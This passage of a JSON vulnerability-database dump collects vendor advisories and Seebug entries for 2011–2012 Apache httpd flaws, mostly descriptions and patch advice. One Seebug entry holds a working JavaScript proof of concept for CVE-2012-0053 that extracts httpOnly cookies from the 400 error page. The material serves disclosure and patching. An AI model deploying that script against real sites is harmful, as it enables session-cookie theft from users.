for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request.\n(CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically.\n", "modified": "2017-09-08T12:08:34", "published": "2012-02-21T05:00:00", "id": "RHSA-2012:0323", "href": "https://access.redhat.com/errata/RHSA-2012:0323", "type": "redhat", "title": "(RHSA-2012:0323) Moderate: httpd security update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T19:42:09", "bulletinFamily": "unix", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request,\nor by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:35", "published": "2012-02-13T05:00:00", "id": "RHSA-2012:0128", "href": "https://access.redhat.com/errata/RHSA-2012:0128", "type": "redhat", "title": "(RHSA-2012:0128) Moderate: httpd security update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T19:42:43", "bulletinFamily": "unix", "description": "The Apache HTTP Server (\"httpd\") is the namesake project of The Apache\nSoftware Foundation.\n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. In certain configurations, if a reverse\nproxy used the ProxyPassMatch directive, or if it used the RewriteRule\ndirective with the proxy flag, a remote attacker could make the proxy\nconnect to an arbitrary server, possibly disclosing sensitive information\nfrom internal web servers not directly accessible to the attacker.\n(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an \"Internal\nServer Error\" response when processing certain malformed HTTP requests,\nwhich caused the back-end server to be marked as failed in configurations\nwhere mod_proxy was used in load balancer mode. A remote attacker could\ncause mod_proxy to not send requests to back-end AJP (Apache JServ\nProtocol) servers for the retry timeout period or until all back-end\nservers were marked as failed. (CVE-2011-3348)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA NULL pointer dereference flaw was found in the httpd mod_log_config\nmodule. In configurations where cookie logging is enabled, a remote\nattacker could use this flaw to crash the httpd child process via an HTTP\nrequest with a malformed Cookie header. (CVE-2012-0021)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nRed Hat would like to thank Context Information Security for reporting the\nCVE-2011-3368 issue.\n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1329 update\nintroduced a regression in the way httpd handled certain Range HTTP header\nvalues. This update corrects this regression. (BZ#749071)\n\nAll users of JBoss Enterprise Web Server 1.0.2 should upgrade to these\nupdated packages, which contain backported patches to correct these issues.\nAfter installing the updated packages, users must restart the httpd\nservice for the update to take effect.\n", "modified": "2018-06-07T02:42:41", "published": "2012-05-07T04:00:00", "id": "RHSA-2012:0542", "href": "https://access.redhat.com/errata/RHSA-2012:0542", "type": "redhat", "title": "(RHSA-2012:0542) Moderate: httpd security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:55:26", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2012-02-01T00:00:00", "published": "2012-02-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30056", "id": "SSV:30056", "type": "seebug", "title": "Apache httpOnly Cookie Disclosure(CVE-2012-0053)", "sourceData": "\n // Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08\r\n// Most browsers limit cookies to 4k characters, so we need multiple\r\nfunction setCookies (good) {\r\n // Construct string for cookie value\r\n var str = "";\r\n for (var i=0; i< 819; i++) {\r\n str += "x";\r\n }\r\n // Set cookies\r\n for (i = 0; i < 10; i++) {\r\n // Expire evil cookie\r\n if (good) {\r\n var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";\r\n }\r\n // Set evil cookie\r\n else {\r\n var cookie = "xss"+i+"="+str+";path=/";\r\n }\r\n document.cookie = cookie;\r\n }\r\n}\r\nfunction makeRequest() {\r\n setCookies();\r\n function parseCookies () {\r\n var cookie_dict = {};\r\n // Only react on 400 status\r\n if (xhr.readyState === 4 && xhr.status === 400) {\r\n // Replace newlines and match <pre> content\r\n var content = xhr.responseText.replace(/\\r|\\n/g,'').match(/<pre>(.+)<\\/pre>/);\r\n if (content.length) {\r\n // Remove Cookie: prefix\r\n content = content[1].replace("Cookie: ", "");\r\n var cookies = content.replace(/xss\\d=x+;?/g, '').split(/;/g);\r\n // Add cookies to object\r\n for (var i=0; i<cookies.length; i++) {\r\n var s_c = cookies[i].split('=',2);\r\n cookie_dict[s_c[0]] = s_c[1];\r\n }\r\n }\r\n // Unset malicious cookies\r\n setCookies(true);\r\n alert(JSON.stringify(cookie_dict));\r\n }\r\n }\r\n // Make XHR request\r\n var xhr = new XMLHttpRequest();\r\n xhr.onreadystatechange = parseCookies;\r\n xhr.open("GET", "/", true);\r\n xhr.send(null);\r\n}\r\nmakeRequest();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-30056", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:58:42", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 50494\r\nCVE ID: CVE-2011-3607\r\n\r\nApache HTTP Server\u662fApache\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u4e2a\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u7f51\u9875\u670d\u52a1\u5668\uff0c\u53ef\u4ee5\u5728\u5927\u591a\u6570\u7535\u8111\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u8fd0\u884c\uff0c\u7531\u4e8e\u5176\u8de8\u5e73\u53f0\u548c\u5b89\u5168\u6027\u88ab\u5e7f\u6cdb\u4f7f\u7528\uff0c\u662f\u6700\u6d41\u884c\u7684Web\u670d\u52a1\u5668\u7aef\u8f6f\u4ef6\u4e4b\u4e00\u3002\r\n\r\nApache HTTP Server\u5728"ap_pregsub()"\u51fd\u6570\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4ee5\u63d0\u5347\u7684\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\u8981\u89e6\u53d1\u6b64\u6f0f\u6d1e\uff0c\u9700\u8981\u542f\u7528mod_setenvif\uff0c\u5e76\u4e14\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u53d7\u5f71\u54cd\u670d\u52a1\u5668\u4e2d\u653e\u7f6e\u6076\u610f\u7684.htaccess\u6587\u4ef6\u3002\u6b64\u6f0f\u6d1e\u6e90\u4e8e "ap_pregsub()" \u51fd\u6570 (server/utils.c) \u4e2d\u7684\u6574\u6570\u6ea2\u51fa\u9519\u8bef\uff0c\u901a\u8fc7\u7279\u5236\u7684.htaccess\u6587\u4ef6\u53ef\u9020\u6210\u5806\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\n\nApache HTTP Server 2.2.x\r\nApache HTTP Server 2.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://httpd.apache.org/", "modified": "2011-11-04T00:00:00", "published": "2011-11-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-23169", "id": "SSV:23169", "title": "Apache HTTP Server "ap_pregsub()"\u51fd\u6570\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:55:46", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 51407\r\nCVE ID: CVE-2012-0031\r\n\r\nApache HTTP Server\u662fApache\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u4e2a\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u7f51\u9875\u670d\u52a1\u5668\uff0c\u53ef\u4ee5\u5728\u5927\u591a\u6570\u7535\u8111\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u8fd0\u884c\uff0c\u7531\u4e8e\u5176\u8de8\u5e73\u53f0\u548c\u5b89\u5168\u6027\u88ab\u5e7f\u6cdb\u4f7f\u7528\uff0c\u662f\u6700\u6d41\u884c\u7684Web\u670d\u52a1\u5668\u7aef\u8f6f\u4ef6\u4e4b\u4e00\u3002\r\n\r\nApache HTTP Server\u4e2d\u7684\u5b50\u8fdb\u7a0b\u53ef\u4ee5\u66f4\u6539scoreboard\u5171\u4eab\u5185\u5b58\u6bb5\u7684\u5185\u5b58\u7c7b\u578b\u8bb0\u5f55\uff0c\u8fd9\u4f1a\u88ab\u5229\u7528\u9020\u6210\u7236\u8fdb\u7a0b\u5173\u95ed\u65f6\u65e0\u6548\u7684\u91ca\u653e\u64cd\u4f5c\uff0c\u4f7f\u672c\u5730\u653b\u51fb\u8005\u53ef\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3002\n0\nApache 2.2.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.apache.org", "modified": "2012-01-17T00:00:00", "published": "2012-01-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30024", "id": "SSV:30024", "type": "seebug", "title": "Apache 2.2.x Scoreboard\u672c\u5730\u5b89\u5168\u9650\u5236\u7ed5\u8fc7\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:12", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2405-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nFebruary 06, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : multiple issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-3607 CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 \n CVE-2012-0031 CVE-2012-0053 \n\nSeveral vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\n An integer overflow in ap_pregsub() could allow local attackers to\n execute arbitrary code at elevated privileges via crafted .htaccess\n files.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\n The Apache HTTP Server did not properly validate the request URI for\n proxied requests. In certain reverse proxy configurations using the\n ProxyPassMatch directive or using the RewriteRule directive with the\n [P] flag, a remote attacker could make the proxy connect to an\n arbitrary server. The could allow the attacker to access internal\n servers that are not otherwise accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append arbitrary\n strings to the host or port parts of the target URI. For example, the\n configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations:\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1\n ProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\nCVE-2012-0031:\n\n An apache2 child process could cause the parent process to crash\n during shutdown. This is a violation of the privilege separation\n between the apache2 processes and could potentially be used to worsen\n the impact of other vulnerabilities.\n\nCVE-2012-0053:\n\n The response message for error code 400 (bad request) could be used to\n expose "httpOnly" cookies. This could allow a remote attacker using\n cross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nThis update also contains updated apache2-mpm-itk packages which have\nbeen recompiled against the updated apache2 packages. The new version\nnumber for the oldstable distribution is 2.2.6-02-1+lenny7. In the\nstable distribution, apache2-mpm-itk has the same version number as\napache2.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2012-02-06T09:24:08", "published": "2012-02-06T09:24:08", "id": "DEBIAN:DSA-2405-1:AE657", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00031.html", "title": "[SECURITY] [DSA 2405-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:54", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:0128\n\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request,\nor by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0128.html", "modified": "2012-02-14T06:13:29", "published": "2012-02-14T06:13:29", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html", "id": "CESA-2012:0128", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:24", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nIt was discovered that the fix for [CVE-2011-3368 __](<https://access.redhat.com/security/cve/CVE-2011-3368>) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially-crafted URI. ([CVE-2011-3639 __](<https://access.redhat.com/security/cve/CVE-2011-3639>), [CVE-2011-4317 __](<https://access.redhat.com/security/cve/CVE-2011-4317>))\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies. ([CVE-2012-0053 __](<https://access.redhat.com/security/cve/CVE-2012-0053>))\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions. An attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a \".htaccess\" file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the \"apache\" user. ([CVE-2011-3607 __](<https://access.redhat.com/security/cve/CVE-2011-3607>))\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown. ([CVE-2012-0031 __](<https://access.redhat.com/security/cve/CVE-2012-0031>))\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-debuginfo-2.2.22-1.23.amzn1.i686 \n mod_ssl-2.2.22-1.23.amzn1.i686 \n httpd-devel-2.2.22-1.23.amzn1.i686 \n httpd-2.2.22-1.23.amzn1.i686 \n httpd-tools-2.2.22-1.23.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.22-1.23.amzn1.noarch \n \n src: \n httpd-2.2.22-1.23.amzn1.src \n \n x86_64: \n httpd-2.2.22-1.23.amzn1.x86_64 \n httpd-devel-2.2.22-1.23.amzn1.x86_64 \n httpd-debuginfo-2.2.22-1.23.amzn1.x86_64 \n mod_ssl-2.2.22-1.23.amzn1.x86_64 \n httpd-tools-2.2.22-1.23.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T15:21:00", "published": "2014-09-14T15:21:00", "id": "ALAS-2012-046", "href": "https://alas.aws.amazon.com/ALAS-2012-46.html", "title": "Medium: httpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:23", "bulletinFamily": "unix", "description": "It was discovered that the Apache HTTP Server incorrectly handled the SetEnvIf .htaccess file directive. An attacker having write access to a .htaccess file may exploit this to possibly execute arbitrary code. (CVE-2011-3607)\n\nPrutha Parikh discovered that the mod_proxy module did not properly interact with the RewriteRule and ProxyPassMatch pattern matches in the configuration of a reverse proxy. This could allow remote attackers to contact internal webservers behind the proxy that were not intended for external exposure. (CVE-2011-4317)\n\nRainer Canavan discovered that the mod_log_config module incorrectly handled a certain format string when used with a threaded MPM. A remote attacker could exploit this to cause a denial of service via a specially- crafted cookie. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2012-0021)\n\nIt was discovered that the Apache HTTP Server incorrectly handled certain type fields within a scoreboard shared memory segment. A local attacker could exploit this to to cause a denial of service. (CVE-2012-0031)\n\nNorman Hippert discovered that the Apache HTTP Server incorrecly handled header information when returning a Bad Request (400) error page. A remote attacker could exploit this to obtain the values of certain HTTPOnly cookies. (CVE-2012-0053)", "modified": "2012-02-16T00:00:00", "published": "2012-02-16T00:00:00", "id": "USN-1368-1", "href": "https://usn.ubuntu.com/1368-1/", "title": "Apache HTTP Server vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:10", "bulletinFamily": "unix", "description": "\nCVE MITRE reports:\n\nAn exposure was found when using mod_proxy in reverse proxy\n\t mode. In certain configurations using RewriteRule with proxy\n\t flag or ProxyPassMatch, a remote attacker could cause the reverse\n\t proxy to connect to an arbitrary server, possibly disclosing\n\t sensitive information from internal web servers not directly\n\t accessible to attacker.\nInteger overflow in the ap_pregsub function in server/util.c in\n\t the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through\n\t 2.2.21, when the mod_setenvif module is enabled, allows local\n\t users to gain privileges via a .htaccess file with a crafted\n\t SetEnvIf directive, in conjunction with a crafted HTTP request\n\t header, leading to a heap-based buffer overflow.\nAn additional exposure was found when using mod_proxy in\n\t reverse proxy mode. In certain configurations using RewriteRule\n\t with proxy flag or ProxyPassMatch, a remote attacker could cause\n\t the reverse proxy to connect to an arbitrary server, possibly\n\t disclosing sensitive information from internal web servers\n\t not directly accessible to attacker.\nA flaw was found in mod_log_config. If the '%{cookiename}C' log\n\t format string is in use, a remote attacker could send a specific\n\t cookie causing a crash. This crash would only be a denial of\n\t service if using a threaded MPM.\nA flaw was found in the handling of the scoreboard. An\n\t unprivileged child process could cause the parent process to\n\t crash at shutdown rather than terminate cleanly.\nA flaw was found in the default error response for status code\n\t 400. This flaw could be used by an attacker to expose\n\t \"httpOnly\" cookies when no custom ErrorDocument is specified.\n\n", "modified": "2011-10-05T00:00:00", "published": "2011-10-05T00:00:00", "id": "4B7DBFAB-4C6B-11E1-BC16-0023AE8E59F0", "href": "https://vuxml.freebsd.org/freebsd/4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0.html", "title": "apache -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "description": "Information leakage, filtering bypass, privilege escalation, DoS.", "modified": "2012-02-03T00:00:00", "published": "2012-02-03T00:00:00", "id": "SECURITYVULNS:VULN:12166", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12166", "title": "Apache multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "description": " Apache HTTP Server 2.2.22 Released\r\n\r\n The Apache Software Foundation and the Apache HTTP Server Project are\r\n pleased to announce the release of version 2.2.22 of the Apache HTTP\r\n Server ("Apache"). This version of Apache is principally a security\r\n and bug fix release, including the following significant security fixes:\r\n\r\n * SECURITY: CVE-2011-3368 (cve.mitre.org)\r\n Reject requests where the request-URI does not match the HTTP\r\n specification, preventing unexpected expansion of target URLs in\r\n some reverse proxy configurations.\r\n\r\n * SECURITY: CVE-2011-3607 (cve.mitre.org)\r\n Fix integer overflow in ap_pregsub() which, when the mod_setenvif module\r\n is enabled, could allow local users to gain privileges via a .htaccess\r\n file.\r\n\r\n * SECURITY: CVE-2011-4317 (cve.mitre.org)\r\n Resolve additional cases of URL rewriting with ProxyPassMatch or\r\n RewriteRule, where particular request-URIs could result in undesired\r\n backend network exposure in some configurations.\r\n\r\n * SECURITY: CVE-2012-0021 (cve.mitre.org)\r\n mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format\r\n string is in use and a client sends a nameless, valueless cookie, causing\r\n a denial of service. The issue existed since version 2.2.17.\r\n\r\n * SECURITY: CVE-2012-0031 (cve.mitre.org)\r\n Fix scoreboard issue which could allow an unprivileged child process\r\n could cause the parent to crash at shutdown rather than terminate\r\n cleanly.\r\n\r\n * SECURITY: CVE-2012-0053 (cve.mitre.org)\r\n Fixed an issue in error responses that could expose "httpOnly" cookies\r\n when no custom ErrorDocument is specified for status code 400.\r\n\r\n The Apache HTTP Project thanks halfdog, Context Information Security Ltd,\r\n Prutha Parikh of Qualys, and Norman Hippert for bringing these issues to\r\n the attention of the security team.\r\n\r\n We consider this release to be the best version of Apache available, and\r\n encourage users of all prior versions to upgrade.\r\n\r\n Apache HTTP Server 2.2.22 is available for download from:\r\n\r\n http://httpd.apache.org/download.cgi\r\n\r\n Please see the CHANGES_2.2 file, linked from the download page, for a\r\n full list of changes. A condensed list, CHANGES_2.2.22 includes only\r\n those changes introduced since the prior 2.2 release. A summary of all\r\n of the security vulnerabilities addressed in this and earlier releases\r\n is available:\r\n\r\n http://httpd.apache.org/security/vulnerabilities_22.html\r\n\r\n This release includes the Apache Portable Runtime (APR) version 1.4.5\r\n and APR Utility Library (APR-util) version 1.4.2, bundled with the tar\r\n and zip distributions. The APR libraries libapr and libaprutil (and\r\n on Win32, libapriconv version 1.2.1) must all be updated to ensure\r\n binary compatibility and address many known security and platform bugs.\r\n APR-util version 1.4 represents a minor version upgrade from earlier\r\n httpd source distributions, which previously included version 1.3.\r\n\r\n Apache 2.2 offers numerous enhancements, improvements, and performance\r\n boosts over the 2.0 codebase. For an overview of new features\r\n introduced since 2.0 please see:\r\n\r\n http://httpd.apache.org/docs/2.2/new_features_2_2.html\r\n\r\n This release builds on and extends the Apache 2.0 API. Modules written\r\n for Apache 2.0 will need to be recompiled in order to run with Apache\r\n 2.2, and require minimal or no source code changes.\r\n\r\n http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/VERSIONING\r\n\r\n When upgrading or installing this version of Apache, please bear in mind\r\n that if you intend to use Apache with one of the threaded MPMs (other\r\n than the Prefork MPM), you must ensure that any modules you will be\r\n using (and the libraries they depend on) are thread-safe.\r\n", "modified": "2012-02-03T00:00:00", "published": "2012-02-03T00:00:00", "id": "SECURITYVULNS:DOC:27611", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27611", "title": "[Announce] Apache HTTP Server 2.2.22 Released", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "description": "Privilege escalation with SetEnvIf in conjunction with crafted HTTP headers.", "modified": "2012-01-11T00:00:00", "published": "2012-01-11T00:00:00", "id": "SECURITYVULNS:VULN:12139", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12139", "title": "Apache privilege escalation", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:55", "bulletinFamily": "unix", "description": "New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\n13.37, and -current to fix security issues. The apr-util package has also been\nupdated to the latest version.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/apr-util-1.4.1-i486-1_slack13.37.txz: Upgraded.\n Version bump for httpd upgrade.\npatches/packages/httpd-2.2.22-i486-1_slack13.37.txz: Upgraded.\n *) SECURITY: CVE-2011-3368 (cve.mitre.org)\n Reject requests where the request-URI does not match the HTTP\n specification, preventing unexpected expansion of target URLs in\n some reverse proxy configurations. [Joe Orton]\n *) SECURITY: CVE-2011-3607 (cve.mitre.org)\n Fix integer overflow in ap_pregsub() which, when the mod_setenvif module\n is enabled, could allow local users to gain privileges via a .htaccess\n file. [Stefan Fritsch, Greg Ames]\n *) SECURITY: CVE-2011-4317 (cve.mitre.org)\n 